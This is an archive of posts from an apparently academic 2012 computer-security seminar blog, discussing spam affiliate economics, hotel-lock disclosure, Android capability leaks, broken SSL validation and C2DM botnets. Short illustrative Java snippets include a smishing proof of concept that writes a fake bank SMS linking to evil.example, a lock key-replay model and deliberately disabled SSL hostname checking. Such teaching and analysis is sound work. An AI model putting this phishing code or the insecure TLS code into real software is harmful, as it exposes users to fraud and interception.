A graduate seminar: current topics in computer security

Archive for the ‘Articles’ Category


Bank of America Security Hole

November 29th, 2012 by ksl3

https://www.privateinternetaccess.com/blog/2012/11/even-a-vpn-service-cant-protect-your-privacy-if-youre-using-bank-of-america/

This article describes a flaw in Bank of America's privacy protections: the bank gives customers full access to their account and account details with just a phone and a Social Security number. Phone numbers are easy to get nowadays and don't warrant discussion; Social Security numbers are also increasingly easy to obtain (any business that pays an individual more than $600 a year needs the individual to sign an IRS W-9 form, which includes a Social Security number).

While the digital age has enabled storing and retrieving large amounts of data in unprecedented ways, it has also had some unfortunate consequences, such as the death of privacy. I don't believe that the lack of privacy is an inherent problem with present technologies, but rather with the attitudes and policies that vendors and consumers continue to hold about personal data. It will be interesting to see where the trend in individual privacy, and the security around it, goes over the next ten years.

Understanding the economy of online affiliate programs is key to fighting them

November 28th, 2012 by kb20

A USENIX Security 2012 talk and paper [1] provide a rare glimpse into how online affiliate programs work; understanding their economics may be the key to controlling these programs. The authors analyze leaked data from three online affiliate programs, amounting to US$185M in gross revenue, over 1M customers, over 1.5M purchases, and more than 2,600 affiliates. First, I will provide a brief introduction to online affiliate programs. Next, I will present the paper's findings, followed by a discussion of ideas on how the government could control these programs or get rid of them altogether.

Most of us have come across unsolicited emails advertising different types of drugs. What we may not all know is that these emails are part of a full-fledged underground economy, with businesses that function much like normal ones: they keep track of financial records, revenue, costs, and so on. The first player in this economy is the customer, the recipient of the spam email, who may turn around and buy drugs online. The next player is the affiliate marketer, who sent the spam email to begin with. Once the customer clicks the link, the affiliate marketer is out of the game, and the transaction is handled from that point on by the affiliate supplier, which has staff for customer service. The affiliate supplier in turn relies on another entity for payment processing. In general, these affiliate programs want to retain customers, so they try to keep them happy by promptly addressing any concerns.

The customers are usually people trying to save money by buying cheaper drugs online. The affiliate marketers are mostly spammers who own botnets; they work purely on commission, based on the volume of traffic they drive to the site. Some affiliate programs apply a screening process to recruit the best affiliate marketers, while others let anybody join, since it costs the program nothing: affiliates are paid on pure commission. The payment service providers (PSPs) charge a fee on each transaction, roughly 10% of its value. Shipping and handling is around 11.5% of the transaction, and the cost of the actual item is only around 7%. After the 30% paid in commission to the marketing affiliate and the other costs of operating a business, the average actual profit margin is around 16%, or 30% in a highly optimistic case.
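To make that cost structure concrete, here is a back-of-the-envelope sketch in Java using the percentages above. The "other operating costs" figure is my own assumption, chosen so the bottom line lands near the paper's ~16% average margin.

```java
// Back-of-the-envelope breakdown of a US$100 pharmacy order, using the
// percentages quoted above. "otherCosts" is an assumption chosen so the
// bottom line lands near the paper's ~16% average margin.
public class AffiliateEconomics {
    public static void main(String[] args) {
        double revenue    = 100.0;
        double pspFee     = 0.10  * revenue; // ~10% payment processing
        double shipping   = 0.115 * revenue; // ~11.5% shipping & handling
        double goods      = 0.07  * revenue; // ~7% cost of the actual item
        double commission = 0.30  * revenue; // ~30% to the affiliate marketer
        double otherCosts = 0.255 * revenue; // assumed remaining overhead

        double profit = revenue - pspFee - shipping - goods - commission - otherCosts;
        System.out.printf("Profit per $100 order: $%.2f (%.1f%% margin)%n",
                profit, 100 * profit / revenue); // ~$16.00 (16.0% margin)
    }
}
```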

From their analysis of the data, the authors found that 95% of the customers are from the US, Canada, Australia, and Europe. Erectile-dysfunction drugs make up 75% of the orders and generate 80% of the revenue. An interesting finding is that between 2010 and 2011, one of the affiliate programs, RX-Promotion, had its relationship with its PSP go sour, resulting in a sharp decline in profit to the point where it nearly closed: with no way to process payments, a program can neither take new customers nor keep its affiliate spammers. Another point to note is that just three PSPs processed 84% of the transactions for all three affiliate programs. A further important insight is that 10% of the affiliates accounted for 80% of these programs' revenue. Most affiliates failed, with a median revenue of US$350 per year; however, top earners like the operators of Rustock earned US$1.9M, and Scorrp2 earned US$3M. The affiliate with the largest revenue, webplanet, earned US$4.6M through web-based advertising.

To summarize: if we have any hope of fighting these affiliate programs that sell fake or unauthorized drugs online, we first have to cut their lifeline, namely their connection to PSPs. Since only a handful of PSPs do the majority of the processing, this is a cost-effective move. And since, as we saw, a handful of affiliates generate most of the revenue, the most cost-effective way to curb the industry further is to direct operations against these "big player" affiliates.

References:

[1] https://www.usenix.org/conference/usenixsecurity12/pharmaleaks-understanding-business-online-pharmaceutical-affiliate

Full disclosure in the real world

November 27th, 2012 by bss4

If full disclosure of lock picking aroused the ire of locksmiths in the past, it still does. Here are two reports by Andy Greenberg (a Forbes reporter on security-related issues): (1) dated July 23rd, 2012, on a Black Hat presentation by Cody Brocious on exploiting a certain brand of hotel locks, and (2) dated November 26th, 2012, on a recent robbery at a famous hotel in, yes, Houston! What is the connection, you might ask. Investigators suspect the alleged thief used techniques from (1) to break into multiple rooms in the hotel.

The Black Hat presentation discloses the technical details of hacking the locks by plugging an active probe into a small hole under the digital lock (meant for DC power and for inserting the portable programmer used to program the lock) and reading out the key. Bear in mind that the PP (portable programming) slot is openly accessible, not hidden under the lock panel. An attacker simply needs to walk up to the victim's door, plug an Arduino board (imitating the portable programmer that hotel staff use) into the PP slot, and initiate communication with the lock, ultimately getting the lock to give out the very key that opens it! It turns out that this brand of lock stores keys in memory and requires no authentication for the read-memory command. So, if one knows where the keys are stored, it is not difficult for an attacker to read a key and simply replay it to open the lock.
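To make the flaw concrete, here is a minimal conceptual model in Java. This is emphatically not the real lock's firmware or wire protocol; the memory layout, key bytes, and method names are invented for illustration.

```java
import java.util.Arrays;

// Conceptual model of the flaw, NOT the real lock firmware or protocol:
// a lock that answers read-memory requests without authentication leaks
// the very key it later checks against.
public class LockDemo {
    static class VulnerableLock {
        private final byte[] memory = new byte[64];
        private static final int KEY_ADDR = 16, KEY_LEN = 4;

        VulnerableLock(byte[] key) {
            System.arraycopy(key, 0, memory, KEY_ADDR, KEY_LEN);
        }

        // The fatal design choice: no authentication on reads.
        byte[] readMemory(int addr, int len) {
            return Arrays.copyOfRange(memory, addr, addr + len);
        }

        boolean open(byte[] presentedKey) {
            return Arrays.equals(presentedKey,
                    Arrays.copyOfRange(memory, KEY_ADDR, KEY_ADDR + KEY_LEN));
        }
    }

    public static void main(String[] args) {
        VulnerableLock lock = new VulnerableLock(new byte[]{0x13, 0x37, 0x42, 0x07});
        // Attacker: read the key out of memory, then replay it.
        byte[] stolenKey = lock.readMemory(16, 4);
        System.out.println("Door opens: " + lock.open(stolenKey)); // true
    }
}
```

The fix is equally conceptual: authenticate (or remove) the read-memory command, which is exactly what a hardware upgrade has to accomplish.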

It is suspected that the robbery took place using this type of intrusion; apparently, opening the door via the PP slot leaves a trace (thanks to good old auditing mechanisms), which let investigators link the theft to material in the Black Hat talk. This incident raises the question of who is right and who is wrong. It is evident that full (not responsible) disclosure led to a robbery in which a lady lost her laptop. So why didn't Cody Brocious, the Black Hat researcher, disclose the flaw to the lock-making firm instead? Let's suppose that he did. Do you think the firm would go about upgrading the millions of locks installed in hotels around the world, or would they simply figure, 'No harm will come if nobody knows about it', the basis of security by obscurity? And now that the firm has a fix, they are charging customers for their own hardware upgrades? Isn't it their obligation to fix this for free? It's not a feature upgrade we are talking about; it is simply about making the locks do what locks are supposed to do.

What can the affected hotels do, you ask? Either pay up for the "upgrade" or go low-tech: plug the PP slot with a cap or some gooey concoction of the kind used to fill holes in walls.

More confused deputies

November 7th, 2012 by bss4

I started following the blogs listed in the course blog's information-security links, of which this Russian blog is one. The blog reported on a capability leak, recently discovered by a group of researchers at NC State University, affecting several Android phones. Let's look into the issue in a little more detail.

Capability leak

Let's start by defining a capability leak. Think of capabilities as Android permissions. Now say system app A (e.g., Android's messaging app) acts as a deputy for third-party apps wanting to send SMS messages via app A; that is, while a third-party app B can request that app A send a particular SMS message to an outbound number, B does not have the authority to do so by itself. Since sending SMS is security-critical functionality, one would expect app A to check whether app B holds the required SEND_SMS permission before acting on B's behalf. If app A does perform the required check, it guards its privilege (capability) of sending SMS. Otherwise, there is a privilege (capability) leak, allowing virtually any app without the requisite permission to send SMS messages via app A.
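Here is a minimal sketch of the guard a well-behaved deputy would apply, assuming app A exposes its SMS functionality over Binder IPC; the class name and method are illustrative, not from any real vendor app.

```java
import android.Manifest;
import android.content.Context;
import android.content.pm.PackageManager;
import android.telephony.SmsManager;

// Sketch of the guard a deputy (app A) should apply before sending an SMS
// on a caller's behalf. Assumes this method is invoked over Binder IPC
// (e.g., from an AIDL-generated service stub), so the calling identity
// is available to checkCallingPermission().
public class SmsDeputy {
    private final Context context;

    public SmsDeputy(Context context) { this.context = context; }

    public void sendForCaller(String dest, String body) {
        // The crucial check: does the *caller* itself hold SEND_SMS?
        // A deputy that omits this check leaks the capability to any app.
        if (context.checkCallingPermission(Manifest.permission.SEND_SMS)
                != PackageManager.PERMISSION_GRANTED) {
            throw new SecurityException("Caller lacks SEND_SMS");
        }
        SmsManager.getDefault().sendTextMessage(dest, null, body, null, null);
    }
}
```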

The attack

A description of the attack itself is linked earlier in this article. To summarize, the researchers found that the WRITE_SMS permission (call it a capability) is being leaked. In the extreme case, this means an app without the WRITE_SMS permission (or with no requested permissions at all) can write a fake SMS via the system messaging app. Not surprisingly, this can be used to phish end users; it seems fashionable to call this "smishing", short for SMS phishing.
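An exploit would take roughly this shape; the action string and extras below are hypothetical stand-ins, since the actual vulnerable components vary by vendor.

```java
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;

// Hypothetical shape of a smishing exploit against a leaky deputy.
// The action string and extras are invented for illustration; the real
// vulnerable components differ per vendor and are not named here.
public class SmishingPoc extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent i = new Intent("com.vendor.messaging.WRITE_SMS"); // hypothetical
        i.putExtra("address", "YourBank");
        i.putExtra("body", "Account locked. Verify at http://evil.example");
        // This app requests *no* permissions, yet the unguarded system app
        // writes the fake SMS into the inbox on its behalf.
        sendBroadcast(i);
        finish();
    }
}
```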

While such a leak is not new (the first description of the confused-deputy problem dates back to Hardy's article from 1988), the fact that something as seemingly evident as the WRITE_SMS permission leak had not been brought to notice before is alarming. More alarming still, the attack is claimed to work on the latest and greatest version of Android (and prior versions as well) and across phones from multiple OEMs.

More to come?

The researchers who discovered the leak published a paper earlier this year about the framework they built, Woodpecker, which automatically discovers capability leaks in Android system images. Although this particular leak finds no mention in the paper, it seems the leak was found in the course of experimenting with the framework and probing for more. It shouldn't be surprising if more leaks are uncovered.

Having said that, the researchers' framework has several limitations: (1) it does not consider capability leaks in C code, and Android has a significant native code base; (2) it does not consider the case where multiple malicious applications collude to achieve the same end result as a capability leak; and (3) it only scans for leaks of 13 of the more than 200 default Android permissions, and only in cases where the originator of the leak is a pre-loaded app (an app in the stock image); it is realistic for third-party apps to be doing the same thing.

Article: SSL Vulnerabilities Found in Critical Non-Browser Software Packages

October 25th, 2012 by Martha

Michael Mimoso's article today at Threatpost summarized a recent ACM CCS '12 paper that examined just how well SSL certificate validation is implemented in a variety of applications. (Hint: not well.)

From the paper:
“SSL certificate validation is completely broken in many critical software applications and libraries” – so broken that “any SSL connection from any of these programs is insecure against a man-in-the-middle attack” [1].

Much of the affected software the authors found dealt with money, e.g., Amazon and PayPal. However, the worst-bug award goes to Chase's Android mobile banking app, as even some guy with an evil Wi-Fi access point can steal Chase banking credentials.

The article does an OK job of covering the paper, but it does say some silly things, like "the death knell for SSL is getting louder" [2]. The SSL protocol itself is fine. Even the libraries implementing SSL are fine [1].
Instead, the paper claims that poorly designed developer-facing SSL library APIs are at fault, as they "expose low-level details of the SSL protocol" that confuse developers. The article also ignores the helpful advice section for developers at the end of the paper.
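For a flavor of what "completely broken" validation looks like in practice, here is the kind of anti-pattern the paper catalogs, rendered as a minimal Java sketch (deliberately insecure; the URL is a placeholder):

```java
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLSession;
import java.net.URL;

// Illustration of the anti-pattern the paper documents (do NOT ship this):
// silencing certificate/hostname errors instead of fixing the trust setup.
public class BrokenSslDemo {
    public static void main(String[] args) throws Exception {
        // Accepts ANY hostname for ANY certificate: a man in the middle
        // presenting a valid cert for evil.example now passes as your bank.
        HttpsURLConnection.setDefaultHostnameVerifier(new HostnameVerifier() {
            public boolean verify(String hostname, SSLSession session) {
                return true; // the bug: "make the warning go away"
            }
        });
        HttpsURLConnection conn =
                (HttpsURLConnection) new URL("https://example.com/").openConnection();
        conn.connect(); // "works", but is insecure against MITM
        System.out.println(conn.getResponseCode());
        conn.disconnect();
    }
}
```

One line silences the hostname check for the whole process, which is precisely why a man in the middle with any valid certificate, such as the evil Wi-Fi access point above, sails through.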

While the paper itself is solid, several readers disagreed that the whole API is at fault.

Comments left on the article's Slashdot post [3] brought up the fact that many SSL libraries, such as OpenSSL, are poorly documented, and that the API might not be entirely at fault. Additionally, a comment on the article further highlights that "this isn't a problem with the SSL API"; instead, it is a "problem with the lack of a standard mechanism" for SSL certificate management, since the API "provides hooks for connecting to a certificate manager instead of providing" one.

More cool stuff related to the paper can be found at Georgiev’s website under Publications here: https://www.cs.utexas.edu/~georgiev/publications.php.

[1] M. Georgiev, R. Anubhai, S. Iyengar, D. Boneh, S. Jana, V. Shmatikov. The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software. ACM CCS 2012. http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf

[2] http://threatpost.com/en_us/blogs/ssl-vulnerabilities-found-critical-non-browser-software-packages-102512

[3] http://it.slashdot.org/story/12/10/25/2020223/ssl-holes-found-in-critical-non-browser-software

X-Ray for Android

October 17th, 2012 by bss4

X-Ray is an Android app developed by Duo Security (http://www.duosecurity.com/) that scans your device for vulnerabilities that could potentially be exploited. It focuses on privilege-escalation vulnerabilities: the sort that would give an attacker root.

App scanning vs. system scanning:

X-Ray does not scan apps; it scans the device's firmware (or ROM), comprising, among other things, the underlying kernel, third-party native libraries, and system binaries.


[Figure: the Android software stack. Source: http://www.arm.com/images/androidStack.jpg]

In Android's software stack (see figure), this means the Linux kernel and certain library components, e.g., WebKit and libc, among other things. Utilitarian system binaries, e.g., logcat and adb, are also part of the ROM that X-Ray scans.

As one can see, X-Ray chooses an altogether different layer of the software stack to scan for vulnerabilities. Mobile anti-virus apps rely on scanning the applications themselves, while X-Ray scans the underlying system software whose vulnerabilities malicious apps exploit. The argument put forward by X-Ray's authors is that fingerprinting malicious apps can get out of hand: slightly different variants of known malware are engineered on a regular basis, and keeping up with them not only requires time and effort but also does a poor job, since malware that has not yet been fingerprinted can evade anti-virus checks. Note also that there are a large number of app developers whose code would need fingerprinting; on a platform like Android, where the barrier to becoming a developer is low, anyone and everyone can be an app developer.

Accountability:

System software (the kernel, open-source libraries, etc.), on the other hand, is maintained in a more controlled environment: the people who maintain these components are fewer in number, albeit distributed. For instance, issues in Android's Linux kernel ought to be tracked by Google, by OEMs like Samsung, and/or by carriers such as T-Mobile; open-source libraries are maintained by known entities whose responsibility it is to track and resolve known (security) bugs. This means that, unless a vulnerability lies solely at the application layer, a given security bug can be attributed to the known entity in whose code it exists. From then on, it is that entity's responsibility to fix the bug and not let malware writers exploit it. In contrast, classical anti-virus solutions only tell the end user whether an app is malicious; the blame falls solely on the app developer. The end user has no knowledge of where the fault for the malware lies: is the malware writer (app developer) doing something nasty on my phone, or is he/she simply exploiting a known fault in the system software?

X-Ray scans the system software and (with the user's consent) collects information on which vulnerabilities persist in a phone's ROM. Assuming the app becomes popular, with many users installing it and consenting to its collection of security-related information, it will be interesting to see if and how blame is shared among the different entities. For instance, to what extent is carrier X to blame for not shipping a security patch for a known bug? This, in turn, could motivate a collective petition on the users' part seeking immediate remediation from the entity at fault. The authors of X-Ray concede that the incentives for a given entity to expend effort pushing a patch are skewed. Say device A from carrier X has a known unpatched vulnerability; while X works on updating every device A, a new device running the latest ROM (which patches the known vulnerability) comes out, and users start upgrading to it, perhaps more out of wanting a newer phone than a more secure phone. How does this incentivise X? Questions like these require a broader study of the cost-benefit aspects of patching and patch deployment.

Conclusion:

Personally, I feel X-Ray is a step in the right direction. From their website, I gather that they have a preliminary dataset from about 20,000 Android devices that have installed the app, and that over half of these devices have unpatched vulnerabilities. For those interested, one of the main chaps behind the app, Jon Oberheide, has a webinar next week. See http://info.duosecurity.com/webinar-mobile-vulnerabilities

On the security implications of C2DM

September 29th, 2012 by bss4

When I read about Google's Android Cloud to Device Messaging (C2DM) framework, whose successor is named Google Cloud Messaging (GCM) for Android [1], back when it was introduced, I thought it was a security faux pas on Google's part. In short, the framework lets Android app developers register with Google's push-notification service, which then allows a developer to send short messages to end-user devices on which that developer's app is installed. A message travels from the app developer's (remote) server, via Google's servers, to the device. In keeping with Google's open policy, there is no vetting: any app developer can use GCM as long as he/she declares the relevant permissions in the manifest and the end user approves them during installation. To make matters worse, attackers can simply repackage a good app, embed a C2DM-based channel in it, and use that channel maliciously. In our first class presentation, on [4], Lee and I spoke of how prevalent repackaging, and its subsequent deployment on third-party app markets, is in the malware-writing community: the study found that 86% of malicious apps in third-party Android markets are repackaged.

With a hunch that I was right, I searched Google for "exploiting c2dm", and the first result was a paper titled "Cloud-Based Push Styled Mobile Botnets…" [2]; why not? The paper has been accepted at this year's Annual Computer Security Applications Conference (ACSAC). But first, a bit about C2DM.

C2DM

An app developer, say Charlie, signs up with C2DM by providing a username, a password, and the package name of his application. The following protocol ensues (a code sketch of steps (a) and (d) appears after the list):

a) Charlie's application, let's call it BotMeister, registers itself with a C2DM server, providing Charlie's C2DM username and the device ID of the phone on which it is installed. Note that a device ID uniquely identifies a phone. Also, this step presupposes that BotMeister has been installed by a user who consented to the app's C2DM-specific Android permissions [1].

b) The C2DM server provides BotMeister a unique registration ID identifying the device it is running on. (Are you wondering why they don't reuse the device ID?)

c) BotMeister sends the registration ID from (b), along with its C2DM username (the same as Charlie's), to Charlie's server. Google obviously doesn't want Charlie's server to know end users' device IDs; no wonder the C2DM server generates a new unique ID for each device.

d) Charlie authenticates to a C2DM server with his credentials, after which the server hands him an auth token; subsequently, Charlie packages the auth token, his message, and the registration ID from (b), and sends them back to the C2DM server to be relayed to the device where that copy of BotMeister is installed. Note that Charlie can only send a message to one device at a time; GCM, however, allows multicast messages.

e) Finally, the C2DM server forwards the message to the device whose ID maps to the registration ID contained in the message. If a C2DM connection is not active on the recipient device, the server stores the message and delivers it when the device eventually establishes a connection.
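As promised, here is a minimal Java sketch of steps (a) and (d), based on how C2DM was historically documented. BotMeister, the sender account, and the payload are the running example's inventions, and details of the long-retired API may differ.

```java
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;

// Sketch of steps (a) and (d) of the C2DM protocol as historically
// documented. BotMeister, the sender account, and the payload are the
// running example's inventions.
public class C2dmSketch {

    // Step (a): BotMeister, on the device, asks C2DM for a registration ID.
    static void register(Context context) {
        Intent reg = new Intent("com.google.android.c2dm.intent.REGISTER");
        reg.putExtra("app", PendingIntent.getBroadcast(context, 0, new Intent(), 0));
        reg.putExtra("sender", "charlie@example.com"); // Charlie's C2DM username
        context.startService(reg);
        // The registration ID of step (b) arrives asynchronously via a
        // com.google.android.c2dm.intent.REGISTRATION broadcast.
    }

    // Step (d): Charlie's server relays a message through Google's servers.
    static int push(String authToken, String registrationId, String payload)
            throws Exception {
        HttpURLConnection conn = (HttpURLConnection)
                new URL("https://android.apis.google.com/c2dm/send").openConnection();
        conn.setDoOutput(true);
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Authorization", "GoogleLogin auth=" + authToken);
        String body = "registration_id=" + URLEncoder.encode(registrationId, "UTF-8")
                + "&collapse_key=cmd"
                + "&data.payload=" + URLEncoder.encode(payload, "UTF-8");
        conn.getOutputStream().write(body.getBytes("UTF-8"));
        return conn.getResponseCode(); // 200 on success
    }
}
```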

Given the basic C2DM protocol, it is not hard to conceive of a botnet framework built on top of it. Charlie's BotMeister can do bad things on the devices it is installed on by using information contained in a C2DM message. First, the message could carry a malicious payload that escalates privileges on the device; second, C2DM could simply be used to create, and subsequently remote-control, bots (Charlie's victims) from Charlie's command-and-control (C&C) server. The paper talks of the latter. Now, a bit about the paper.

C2DM Botnet

The botnet functionality itself isn't interesting; the authors build a botnet by the book, e.g., collecting user info. What is interesting is that their framework strives to be as stealthy as possible to evade detection, and they attempt to make their bot design both scalable and fault-tolerant. It is stealthy in the following way: the framework cleverly modifies step (c) of the C2DM handshake protocol (see the preceding section) by making BotMeister communicate with Charlie's server via a C2DM server. The idea is that a defense against the proposed attack might inspect the URLs BotMeister communicates with; by relaying the reply via C2DM, the recipient as seen from the device is a C2DM server, not Charlie's.

Scalability is necessary because C2DM allows one to send at most 200,000 messages per day per sender. (GCM, however, has no daily quota: the more the merrier.) Scalability is addressed by proposing a variant of the C2DM handshake protocol in which Charlie registers multiple usernames and uses each to run a subnet of bots; for example, commanding a million bots once a day would take at least five sender accounts.

Fault tolerance is necessary because Google can deregister a C2DM username seen to be doing bad things. The scalability solution helps tolerate disruptions to a certain extent, since Charlie can fall back on alternate usernames that have not yet been banned. Charlie can also keep alternate C&C servers as backups, making detection of the malice more difficult.

Prototype

The authors' prototype is a neat example of a real-world botnet framework using C2DM. Apart from the things mentioned above, the authors present an evaluation showing that their framework not only uses resources sparingly (little network bandwidth and power consumption) but also makes classic anomaly-based intrusion detection hard to apply, because the differences in resource usage between a normal and an infected device are so small. For more, read the paper 🙂

Summary

C2DM/GCM for Android introduces a new attack vector into the Android ecosystem, and the paper discussed here provides a real-world prototype of a botnet framework built on it. Conceptually, C2DM/GCM bloats Android's already unmanageable Trusted Computing Base [3] (comprising the Linux kernel and the Android middleware) by adding remote entities to it that merit no trust at all. Consequently, even if Google hardens the operating system, attackers can control devices remotely.

Also, Google is not the only vendor offering such a push-notification service to developers. Apple, Microsoft, BlackBerry, and Symbian all have similar push-notification frameworks that beg to be examined more closely.

References:

[1] Google Cloud Messaging for Android: http://developer.android.com/guide/google/gcm/index.html

[2] "Cloud-Based Push-Styled Mobile Botnets: A Case Study of Exploiting the Cloud to Device Messaging Service", S. Zhao et al., http://www.cse.cuhk.edu.hk/~pclee/www/pubs/acsac12.pdf

[3] Trusted Computing Base: Wikipedia, http://en.wikipedia.org/wiki/Trusted_computing_base

[4] "Dissecting Android Malware: Characterization and Evolution", Y. Zhou et al., http://www.csc.ncsu.edu/faculty/jiang/pubs/OAKLAND12.pdf